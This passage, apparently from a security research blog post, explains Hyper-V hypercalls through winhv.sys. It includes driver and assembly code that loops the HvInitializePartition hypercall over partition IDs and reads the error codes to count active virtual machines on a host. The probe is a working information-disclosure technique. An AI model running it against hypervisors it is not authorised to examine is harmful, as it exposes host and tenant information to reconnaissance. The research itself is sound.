<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPostMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorNumberToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEndOfMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSint </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSintOnCurrentProcessor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSignalEvent </span></div>
</td></tr>
</tbody></table>
</div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In order to be able to use the export function winhv.sys can either dynamically calculate the addresses of the functions (7), or to create a lib-file (8). Consider the second option.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When you declare functions like stdcall (32-bit version of the driver) in the def-file, you must specify the ordinals of the functions or when loading the driver the imported functions will not be found (for some reason, the table import function hyperv3.sys driver gets a postfix @ number, even if the def-file register WinHvGetPartitionProperty @ 16 = WinHvGetPartitionProperty):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty@16 @42</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To create a def-file using the output of dumpbin:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">dumpbin /exports winhv.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(The Windows Server 2016 TP2 is using a winhvr.sys driver root-section, so the def-file for the driver in the OS is necessary to form it).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To build a 64-bit driver you do not need to make any changes.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After editing the def-file it must be re-form the lib-file with the command (for x86):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhv.def /OUT:winhv.lib /machine:x86 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For x64 (performed 1 time for a specific version winhv.sys):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhv64.def /OUT:winhv64.lib /machine:x64</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(of course, run native tools command prompt before execute this)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's try it in a loop from 0 to 0x100 consistently meet Hypercall 0x41 (HvInitializePartition), with the PartitionID in ECX, equal to the value of the loop iterator, with Fast bit (to pass parameters through the registers.) with EAX returns the output of the hypervisor.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (i = 0x0; i <=0x100; i++)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintEx(</span><span style="background-color: white; color: darkslategrey; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DPFLTR_IHVDRIVER_ID</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: #6f008a; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBG_PRINT_LEVEL</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: #a31515; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"i %x VMCALL_EAX %x"</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,i,ARCH_VMCALL_REG_MOD(i));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ARCH_VMCALL_REG_MOD </span><span style="background-color: white; color: purple; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PROC</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> param1:</span><span style="background-color: white; color: purple; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DWORD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">push</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">push</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">push</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edx</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ecx</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, param1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">eax</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10041h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pop</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pop</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pop</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ARCH_VMCALL_REG_MOD </span><span style="background-color: white; color: purple; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ENDP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As a result (for Windows Server 2012), we obtain</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="216" src="https://lh3.googleusercontent.com/m12JCJ_oOpdXnwxw5ztpOgt6nRZXJY192AkVdpcqPOpQQ-_N9msozBh64m5g8BDjr8s-I5cokHdtAZXEb_gpum43SOZktcgbzwgFJOlX3phLJN_BLyNChEfuHD-hfvX4NHOSN6b-njwYF1o9" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="515" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In case if in the ecx was transferred to the active virtual machine PartitionID, the hypervisor returns 6 (HV_STATUS_ACCESS_DENIED), in other cases - d (HV_STATUS_INVALID_PARTITION_ID). Taking advantage of this fact, and the fact that the ID of each new section is calculated by simple adding 1 to the ID of the previous section, and the ID root-partition is always equal to 1, you can set the number of active virtual machines on the host. To do this, slightly modify the code for the driver:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (i = 0x2; i <=0x10000; i++)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">res = ARCH_VMCALL_REG_MOD(i);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (res == </span><span style="background-color: white; color: #6f008a; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS_INVALID_PARTITION_ID</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintEx(</span><span style="background-color: white; color: darkslategrey; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DPFLTR_IHVDRIVER_ID</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: #6f008a; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBG_PRINT_LEVEL</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: #a31515; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"PartitionID %x VMCALL_EAX %x \n"</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,i,res);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintEx(</span><span style="background-color: white; color: darkslategrey; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DPFLTR_IHVDRIVER_ID</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: #6f008a; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBG_PRINT_LEVEL</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: #a31515; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Number of active virtual machines: %x \n"</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,counter);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and get a list of active sections ID and number:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="54" src="https://lh5.googleusercontent.com/QUNSIIcSCz5ODPERea-jsiuosy5p8x5cCARFNo1UPfSQDjxruaxxYf245t2lfR6d9c4Rw5F2rtGePwW186BDddtJOJPESrRkiJcZu7Ohp2VYpgqkoKMvWrZqj0DWIgHgWbkc5nAqmlfLWZMU" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="351" /></span></div>
